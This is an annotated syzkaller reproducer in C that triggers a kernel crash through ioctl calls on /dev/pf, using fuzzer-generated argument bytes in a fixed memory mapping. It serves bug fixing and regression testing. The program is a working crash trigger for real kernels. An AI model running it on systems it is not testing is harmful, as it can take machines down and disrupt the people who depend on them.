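// https://syzkaller.appspot.com/bug?id=9d0c17fac0ddf74d41d7c322315fb8f3327ef754
// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// Kernel crash reproducer: opens /dev/pf twice and issues three ioctl()
// requests against it with fuzzer-chosen argument bytes. All argument
// memory lives in one fixed mapping at 0x20000000, so the raw addresses
// below are stable between runs. Useful for a defender as a regression
// test for the pf ioctl path once the underlying kernel bug is patched.
//
// NOTE(review): the original include list was garbled during extraction
// (ten bare `#include` lines with the header names lost). The headers
// below are the ones this code actually needs; they are not a
// reconstruction of the original list.

#define _GNU_SOURCE
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

// Descriptors returned by the two openat() calls below; stays at
// (uint64_t)-1 if the corresponding open fails.
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};

int main(void)
{
  // Back the fixed data area: 16 MiB at 0x20000000, prot 7 (rwx), flags
  // 0x1012 passed numerically — presumably fixed|private|anonymous on the
  // target OS; confirm against the target's <sys/mman.h>. Every memcpy()
  // and store below writes into this range, so exit instead of faulting
  // on an unmapped address if the mapping could not be established.
  if (syscall(SYS_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x1012ul, -1, 0ul) == -1)
    return 1;

  intptr_t res = 0;

  // First handle: /dev/pf opened with flags 2 (O_RDWR) relative to
  // 0xffffffffffffff9c, i.e. -100, presumably AT_FDCWD.
  memcpy((void*)0x20000000, "/dev/pf\000", 8);
  res = syscall(SYS_openat, 0xffffffffffffff9cul, 0x20000000ul, 2ul, 0ul);
  if (res != -1)
    r[0] = res;

  // Request 0xc4704434: under the BSD ioctl encoding this is an in/out
  // request with a 0x470-byte argument, group 'D' (0x44), number 0x34.
  // It is issued once on an invalid descriptor (-1, expected to fail
  // with EBADF) with a one-byte argument of 0x02, and once on the pf
  // handle with an argument area at 0x20000040 that this program never
  // writes — it holds whatever the fresh mapping contains.
  memcpy((void*)0x20000480, "\x02", 1);
  syscall(SYS_ioctl, -1, 0xc4704434ul, 0x20000480ul);
  syscall(SYS_ioctl, r[0], 0xc4704434ul, 0x20000040ul);

  // Second handle: /dev/pf opened with flags 0 (O_RDONLY).
  memcpy((void*)0x20000140, "/dev/pf\000", 8);
  res = syscall(SYS_openat, 0xffffffffffffff9cul, 0x20000140ul, 0ul, 0ul);
  if (res != -1)
    r[1] = res;

  // Argument block for the final ioctl, starting at 0x20000580:
  // 1024 bytes of fuzzer-generated filler, then 32 more bytes at
  // 0x20000980, then a run of individually stored fields from
  // 0x200009a0 to 0x200009e8. The field layout is not known from this
  // file alone; it presumably mirrors the kernel's argument struct for
  // request 0xc4504441 — confirm against the target's pf headers.
  memcpy(
      (void*)0x20000580,
      "\x60\xea\x22\x9d\x34\xf5\xe5\x8a\xc5\x06\xb9\xf9\x4f\xd1\x69\xe0\x82\x17"
      "\x39\x99\xd2\xdf\xab\x9e\xe7\x37\x7f\xe9\x95\x4d\x8c\x16\xd7\x80\xe1\xe3"
      "\x4d\xcb\xa4\x7a\x53\xcd\xaf\xb8\xe5\xa3\xfc\x1e\xb4\xd6\xda\x05\x2d\x31"
      "\xdd\xe4\x0b\x93\xa1\xae\x22\xfe\xfc\x4b\xdb\x98\x8c\x0b\xb3\x02\xb8\x46"
      "\xac\x3d\xdb\x8b\x89\x88\xc4\xaa\x39\x78\x7c\x38\xa9\xde\xe7\xe2\x2c\x4e"
      "\xd7\x36\x0d\x22\xf6\x37\x32\x87\x17\x7f\x8a\x8e\x0c\x9b\xc4\x0f\x9f\x86"
      "\xdc\xdc\xe7\xc2\xd7\x66\xca\x8f\x22\xc4\x05\xd0\xc5\x08\x85\x29\x02\x39"
      "\x80\x7f\xde\xf2\x55\xc2\xa8\x4c\xc0\xc9\x17\xb9\x79\x50\x88\x24\x4b\x10"
      "\xdd\xe0\xad\xe8\x63\x27\x6c\xb0\xa4\x6e\xb8\x22\xaa\x4a\xe3\xb9\xee\x2d"
      "\x03\x43\x2a\x91\x64\xe0\x07\xd6\xba\x93\xfa\xc6\x9a\xfb\x07\xf4\xc4\x97"
      "\x85\xe7\x9f\x53\x24\xe8\xfb\xd3\xd6\xbe\x52\x01\x45\x28\xdc\x95\x77\x06"
      "\xa7\xeb\x88\x16\x2d\x99\x69\xb7\xaa\xed\x83\xd3\x93\x2d\x5b\x38\x12\xc0"
      "\x74\xe3\x5e\x1e\x57\x03\xa2\x56\xa2\x2e\x25\x55\x25\xb8\xc1\x99\x42\xce"
      "\x6b\x6a\x7d\x0b\x86\x8d\x04\x3b\xee\x4b\x78\x62\x65\xf6\x55\xc5\xcb\x26"
      "\x73\x51\x5f\x31\x05\xaf\xeb\x0b\x90\xf2\x92\x8b\xa8\x9e\xe7\xaa\xfc\x41"
      "\x94\xb7\x94\x76\x79\xea\x60\xe0\x86\xf0\x8a\x0c\x07\x9e\x4f\x75\xc3\x5d"
      "\x26\x85\x30\x73\x8e\x8c\xf4\x1c\x59\xf0\x8c\xf9\x70\x86\xec\x72\x61\xfe"
      "\xef\x40\x9e\x25\xe2\xec\xcb\xd6\x5f\x75\x0f\xa3\xa1\xf4\x15\x0f\xae\xdd"
      "\x9e\x8e\xc2\x3d\xc6\x93\x8b\x3f\x1d\x43\xd8\xef\x9c\x2a\xf7\x29\x11\x67"
      "\xf6\x33\x1b\x77\xbd\x4f\xa5\x28\x41\x29\xce\x0f\x90\xfa\xb7\xe3\x4d\x72"
      "\x03\x1c\xda\x96\x76\x76\xfc\xbd\x52\x9a\xbd\x49\x8e\x46\xc8\xf5\x00\x7a"
      "\xfd\x2c\x76\xb0\x83\xbf\x65\xb5\x33\x3b\x5a\x72\xc4\x08\x64\x1a\x00\xf6"
      "\x31\x09\xa2\x86\xae\x21\x16\xce\xb7\x92\xa2\x91\x20\x21\xbb\xff\x23\xa4"
      "\x47\x73\x3a\x70\xc3\x1d\x90\x6b\x1c\xb9\x09\x02\x84\xab\x52\xf8\xc6\x0d"
      "\x9b\xe0\xa4\xce\xea\x6e\x69\x98\x33\x7a\x9e\x52\x06\xde\x56\xa7\xe6\x45"
      "\x18\xe4\xbf\x29\xcc\x93\xcb\x6e\x56\x25\xbc\xea\x6a\x60\xb8\xe6\xd5\xb8"
      "\x8f\x30\x67\x87\xb6\xa2\x36\x64\xb9\x96\x65\x0f\x17\xfb\xca\x34\xf7\x22"
      "\x7a\x09\xb5\xdb\xfe\xb0\xf0\xa5\x04\xf7\x09\xdb\x19\x35\xba\x88\xd4\x1d"
      "\x4f\x37\x4e\xc6\x33\xc3\xe1\x90\x23\xd2\xaa\xf5\xe5\x66\x56\xaf\xe8\x93"
      "\x2c\xc2\xcd\x18\x52\xcc\xe2\x20\x67\x87\xd6\x05\x9e\xc0\x9e\xb3\x2a\xad"
      "\xf6\xa3\x83\xfd\x14\xda\xc7\x71\xd1\x7f\x5e\x0d\xa2\xda\xb7\x05\x7b\xb9"
      "\xf8\xa2\x33\x83\x43\x31\x52\x35\xeb\x31\xad\xbd\xae\x20\xe0\x87\x7d\xfa"
      "\x21\xa2\x8e\x6f\x3a\x66\x65\xa6\x7d\xcd\xcc\x8e\x40\xc4\x64\x1e\xa6\xda"
      "\x3c\xc0\x5f\x5b\xcf\xc2\xb1\xf3\x3d\x5f\x7f\x5b\x17\x39\xd9\xbe\xc7\x2c"
      "\x1e\xf7\xf1\xbb\x3a\xd5\x71\x0c\x20\x0e\x09\xc4\x41\x08\xa9\x63\xd9\x63"
      "\x82\x34\xaa\x82\x05\x70\xe4\x03\x8c\xd4\x3d\x33\x7d\x0b\x14\x32\xc1\x1c"
      "\xc3\xb0\x32\xe2\xcf\x73\xcf\x38\x96\x3f\xba\x60\x6d\x37\x57\xd0\x9c\x05"
      "\xc9\x23\xf4\x2e\x54\x7d\x1e\x3b\x2c\xc9\xd0\x70\xd8\x4f\xcf\xfc\xac\x45"
      "\x87\xe7\x4f\x81\xeb\xb7\xa9\x6c\xfc\x77\x4d\x49\x07\xe1\x39\x91\xce\x48"
      "\x30\xf9\x95\xb3\x5f\x2e\x5d\xf7\x09\x2d\xa8\xd2\x00\x7a\x2e\xee\xa1\x2e"
      "\x0d\xb0\xd5\x3b\xa9\xc5\xfa\x92\x9b\x50\x98\x58\x5f\x3d\x6a\x49\x52\x0d"
      "\xa8\x7e\x04\x50\xf9\x7e\x40\x2f\xf3\xbe\x89\x04\xa7\x43\xef\xc5\xe4\x2d"
      "\x5c\x63\xd2\x1e\x77\x6e\xfd\xa9\xfa\xd3\x5f\xf2\x24\x0c\x1f\x44\xc6\x1e"
      "\x69\xdb\xf3\x09\xca\x49\x8d\xcd\xbf\xe9\x84\xe7\x69\x30\xdc\x85\xba\x7b"
      "\x98\xe3\x66\x03\x80\x20\x1a\x97\xf5\xbf\xb5\xdf\x8e\x7d\xf0\x26\xd6\xcb"
      "\x4d\x93\x65\xa0\x91\x07\xd1\xa8\x08\x23\xa9\xe4\x3f\xd3\xf1\x01\xf8\x0e"
      "\x08\x1d\x10\x9b\xd0\x59\xd9\x69\xe9\x14\xce\x2d\x00\x18\x27\x2c\x2b\x66"
      "\x14\x82\x36\x10\xed\x07\xd2\xa0\x5c\xbb\x6b\x48\xf4\x40\xe0\x9f\xf5\x6a"
      "\xcd\x91\xe6\xcc\xb2\xf1\xe7\x78\x60\x98\x9e\x39\xa1\x14\x12\xab\xb0\x53"
      "\xa8\x27\x0d\xa5\xe8\x7b\xc7\x41\x74\xc0\x82\xe4\x6b\x30\x49\x72\x7b\x37"
      "\xef\xce\x80\xdb\x25\x36\x7b\x76\xf6\xd1\x75\xee\xd3\x2d\x74\x1c\x30\xf7"
      "\x1f\x8d\xf2\x22\x25\x41\x86\x71\x68\xe4\x47\x44\x1d\x58\xee\x2f\x75\x1e"
      "\x63\x27\x45\xe6\x66\xcd\x1d\xf1\xa8\x16\x64\x3e\x31\xc6\xa3\xf4\xc6\x8c"
      "\x4c\x52\x6e\xc8\x11\x1e\x91\x7c\xb1\x61\x4f\x49\xea\x50\x65\xe2\x78\xb0"
      "\x08\xcb\x06\x83\x93\x53\xfc\xed\x75\x26\xec\x0a\xa7\xa6\xff\x77\x2b\xb2"
      "\xad\x06\xe4\x41\xec\x2f\xae\x6e\xcd\x5e\xac\x9c\x47\xc9\x61\x01\xc3\x18"
      "\x6a\x69\xdb\x60\x11\xa6\xe1\x1a\xa0\xfc\x2e\x16\x63\xd1\x78\xe1",
      1024);
  memcpy((void*)0x20000980,
         "\x74\x98\x79\x1c\xdc\x21\xfb\x1a\x50\xa2\xc1\xe1\xfa\xd2\xc9\xdb\x0a"
         "\xb2\x2f\xc4\x9c\x56\x91\x5c\xd1\x27\xe4\x75\xa6\x2f\x9d\xcc",
         32);
  *(uint32_t*)0x200009a0 = 0;
  *(uint8_t*)0x200009a4 = 0;
  *(uint64_t*)0x200009a8 = 0;
  *(uint64_t*)0x200009b0 = 0x800000428;
  *(uint64_t*)0x200009b8 = -1;
  *(uint64_t*)0x200009c0 = 0;
  *(uint64_t*)0x200009c8 = 0x1ff;
  *(uint64_t*)0x200009d0 = 0;
  *(uint64_t*)0x200009d8 = 0x40000000000;
  *(uint64_t*)0x200009e0 = 0;
  *(uint32_t*)0x200009e8 = 0;

  // Request 0xc4504441: in/out, 0x450-byte argument, group 'D', number
  // 0x41, issued on the read-only handle. If the encoded size is what the
  // kernel copies in, the argument spans 0x20000580..0x200009cf, so the
  // stores from 0x200009d0 onward fall outside that window.
  syscall(SYS_ioctl, r[1], 0xc4504441ul, 0x20000580ul);
  return 0;
}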